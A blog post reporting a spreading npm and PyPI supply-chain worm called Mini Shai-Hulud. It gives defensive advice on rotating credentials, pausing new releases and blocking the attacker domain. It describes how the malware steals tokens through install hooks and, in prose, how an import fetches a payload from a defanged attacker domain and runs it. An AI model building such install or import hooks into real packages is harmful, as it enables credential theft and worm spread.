npm and PyPI are under attack by a worm right now and it's called Shai-Hulud
If you've been heads-down today, you missed an active, spreading supply-chain attack on npm called Mini Shai-Hulud. It started around 19:20 UTC with the TanStack packages getting hit. Mistral's official SDK was pulled in shortly after. As of about an hour ago, Aikido is tracking 373 malicious package versions across 169 package names. UiPath, Squawk, TallyUI, BeProduct, and the list keeps growing. This is happening live.
This isn't the first wave of Shai-Hulud. The original hit in September. The second wave in November went through Zapier, Postman, PostHog, and ENS Domains. Today's wave is the same playbook, attributed to a group researchers call TeamPCP.
A few things make this category of attack different from a normal compromise.
It's a self-replicating worm. You install the bad package, the install hook fires, and it grabs every credential it can find on the machine: npm tokens, GitHub tokens, AWS keys, whatever's sitting in your shell environment. Then it uses your tokens to find other packages you can publish to and ships poisoned versions of those too. Every infected developer becomes a new launch pad. That's how 84 packages at lunchtime turned into 169 by happy hour. The attack is reproducing itself.
OIDC trusted publishing didn't save anyone. TanStack was publishing through OIDC, the "modern, correct" way. Short-lived credentials are minted by GitHub Actions at build time, and npm trusts the build because it can verify it came from the repo. Tanner Linsley confirmed how the attacker got in: an orphaned commit was used to gain access to the workflow run that stores the OIDC token. Two-factor was on for everyone. None of it mattered, because OIDC tells npm where a build came from. It doesn't tell npm what the build is doing. Compromise the workflow and OIDC happily signs your malware with a gold star. Same with SLSA provenance. It answers "who built this," not "is this safe." Armin Ronacher made this point earlier today and he's right. We've been selling provenance as the fix and it's not.
The root cause is the same one npm has had forever: install-time code execution. The second you type npm install, arbitrary scripts run on your machine. preinstall, prepare, postinstall. The TanStack attack used a particularly clever variation. It injected an optionalDependencies entry pointing at a GitHub-hosted package, and npm runs lifecycle scripts for git dependencies during install. So a package that looks like a normal dependency quietly reaches into a GitHub repo, runs its prepare hook, and detonates the payload. We've accepted that install scripts run arbitrary code. That is not normal. No other major package ecosystem is quite this casual about it. Until that changes, this keeps happening. The worm isn't exploiting a bug; it's exploiting the design.
The dead-man's switch is real. Earlier waves of Shai-Hulud included a fallback where, if the malware can't reach GitHub or npm to exfiltrate or propagate, it tries to wipe the user's home directory. GitLab, Zscaler, and Trend Micro have all confirmed this from disassembly. The November variant could also register the victim's machine as a self-hosted GitHub Actions runner, turning your laptop into part of the attacker's remote-execution infrastructure. We don't yet know which of these features today's variant carries, but the lineage means you should assume the worst.
One detail that should make every Claude Code user sit up: earlier waves were dropping persistence backdoors into .vscode and .claude folders. Your AI coding assistant's config is a malware vector now.
If you ran npm install today on anything pulling TanStack, Mistral, or anything else from the affected list, rotate your credentials. Not just npm tokens. Assume everything on that machine is burned. GitHub PATs, SSH keys, cloud credentials, the whole drawer. Check ~/.ssh/, ~/.aws/, ~/.config/gcloud/, and your .npmrc. Audit your own recent npm publishes, because if your token leaked it might already have been used to ship more malware under your name. Search GitHub under your account for any repos you don't recognize, especially with description strings like "A Mini Shai-Hulud has Appeared" or "Sha1-Hulud: The Second Coming."
I'm starting to think the only sane move for CI is a minimum package age. Refuse to install anything published in the last 72 hours. Ugly, but if Socket can flag this stuff in six minutes, the rest of us can wait three days.
This one's going to keep unfolding overnight.
Update: it has jumped to PyPI.
Mini Shai-Hulud has crossed ecosystems. PyPI is now compromised too. mistralai==2.4.6 and guardrails-ai==0.10.1 are both confirmed bad. On npm, @opensearch-project/opensearch versions 3.5.3, 3.6.2, 3.7.0, and 3.8.0 are also compromised. That package does 1.3M weekly downloads, so the blast radius just got a lot bigger. More @squawk/* packages have been added to the list.
The PyPI variant changes the timing of the attack. guardrails-ai==0.10.1 executes its payload on import, not on install. On Linux, importing the package pulls git-tanstack[.]com/transformers.pyz, drops it at /tmp/transformers.pyz, and runs it with python3 with no integrity check. A pip install alone doesn't fire the malware. It fires when your code, your tests, or your CI pipeline imports the package. If you installed it today and haven't imported it yet, you have a small window.
This is the same root cause from earlier in the day in a slightly different costume. Python doesn't have npm's postinstall script problem, but it has its own version: code that runs on import. Different ecosystem, same lesson. The language runtime trusts the package author absolutely, and that trust scales to whoever steals the author's credentials.
The attackers left a calling card on the git-tanstack.com domain: a message signed "With Love TeamPCP" that reads "We've been online over 2 hours now stealing creds — regardless I just came to say hello :^)". That confirms attribution to the group researchers had already named. The page links to a YouTube video that is, as you'd guess, a Rickroll.
If you ran pip install today on anything from the affected PyPI list, rotate your credentials the same way you would for the npm side. Plus a few extras: block git-tanstack.com at your egress, audit tmp for transformers.pyz, check ~/.pypirc, and audit your own recent PyPI publishes alongside the npm ones.
Comments
Join the discussion
Sign in to share your thoughts
For anyone on pnpm, this is built in via
minimumReleaseAge(added in v10.16.0, defaults to1440minutes / 24 hours in v11+):This delays installing any newly published version — including transitive deps — until it's been on the registry for at least N minutes. Most malicious releases get caught and yanked within an hour, so a 1-day buffer kills almost the entire attack window with zero effort on your part.
Yet another reason to switch from npm to pnpm.